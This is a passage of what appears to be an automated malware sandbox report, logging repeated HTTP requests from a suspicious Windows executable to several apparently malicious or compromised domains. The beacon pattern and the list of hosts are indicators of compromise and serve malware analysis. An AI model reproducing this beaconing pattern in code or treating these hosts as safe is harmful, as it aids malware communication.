                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  34 | 192.168.2.9 | 49746 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:25.151668072 CEST | 190 | OUT | GET /xs.jpg?513542c=255458436 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:25.816407919 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:25 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  35 | 192.168.2.9 | 49747 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:25.842606068 CEST | 203 | OUT | GET /images/xs2.jpg?59e2a88=565509936 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:26.572041035 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:26 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:26.625884056 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:26.849797010 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:26 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:26 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  36 | 192.168.2.9 | 49748 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:27.008203030 CEST | 308 | OUT | GET /images/xs.jpg?676dbbc=108452796 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159283|1720159259|3|7|0
                                  Jul 5, 2024 08:01:27.757960081 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:27 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  37 | 192.168.2.9 | 49749 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:27.765763998 CEST | 299 | OUT | GET /xs.jpg?6dcc621=690791622 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159284|1720159259|3|7|0
                                  Jul 5, 2024 08:01:28.279501915 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:28 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  38 | 192.168.2.9 | 49750 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:28.356615067 CEST | 303 | OUT | GET /images/xs.jpg?7591ee5=1109530125 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159285|1720159260|3|7|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:28.881627083 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:28 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  39 | 192.168.2.9 | 49751 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:28.891998053 CEST | 191 | OUT | GET /xs.jpg?7ab8dec=1286835000 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:29.544389009 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:29 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  40 | 192.168.2.9 | 49752 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:29.573817015 CEST | 203 | OUT | GET /images/xs2.jpg?811c5c4=406147404 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:30.290400982 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:30 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:30.291455030 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:30.515683889 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:30 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:30 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  41 | 192.168.2.9 | 49753 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:30.640341997 CEST | 308 | OUT | GET /images/xs.jpg?8f21b84=600337936 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159287|1720159259|3|8|0
                                  Jul 5, 2024 08:01:31.365442038 CEST | 594 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:31 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  42 | 192.168.2.9 | 49754 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:31.374584913 CEST | 300 | OUT | GET /xs.jpg?96faab4=1108191980 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159288|1720159259|3|8|0
                                  Jul 5, 2024 08:01:31.872354984 CEST | 585 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:31 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  43 | 192.168.2.9 | 49755 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:31.881536961 CEST | 302 | OUT | GET /images/xs.jpg?9b39c81=651063812 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159288|1720159260|3|8|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:32.375207901 CEST | 333 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:32 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  44 | 192.168.2.9 | 49756 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:32.384197950 CEST | 190 | OUT | GET /xs.jpg?a2ff583=854576015 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:33.041765928 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:32 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  45 | 192.168.2.9 | 49757 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:33.065989971 CEST | 204 | OUT | GET /images/xs2.jpg?a95dff7=1598349231 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:33.802618980 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:33 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:01:33.806544065 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:34.028702974 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:33 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:33 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  46 | 192.168.2.9 | 49758 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:34.578408003 CEST | 308 | OUT | GET /images/xs.jpg?bc3818e=986810310 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159291|1720159259|3|9|0
                                  Jul 5, 2024 08:01:35.309993029 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159295|1720159259|3|10|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  47 | 192.168.2.9 | 49759 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:35.317998886 CEST | 299 | OUT | GET /xs.jpg?c29ba9f=612184029 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159291|1720159259|3|9|0
                                  Jul 5, 2024 08:01:35.836908102 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159295|1720159259|3|10|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  48 | 192.168.2.9 | 49760 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:35.879831076 CEST | 303 | OUT | GET /images/xs.jpg?c814e8b=1888207587 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159292|1720159260|3|9|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:01:36.407869101 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:01:36 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159296|1720159260|3|10|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  49 | 192.168.2.9 | 49761 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:36.422487020 CEST | 191 | OUT | GET /xs.jpg?cd40c9d=1506564171 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:37.073223114 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:01:36 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  50 | 192.168.2.9 | 49762 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:37.124711037 CEST | 204 | OUT | GET /images/xs2.jpg?d5ebd9e=2018814606 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:01:37.843856096 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:01:37 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  51 | 192.168.2.9 | 49763 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:37.982822895 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:01:38.693527937 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:01:38 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:01:38 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  52 | 192.168.2.9 | 49764 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:01:38.826477051 CEST | 311 | OUT | GET /images/xs.jpg?e924854=-1850289336 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
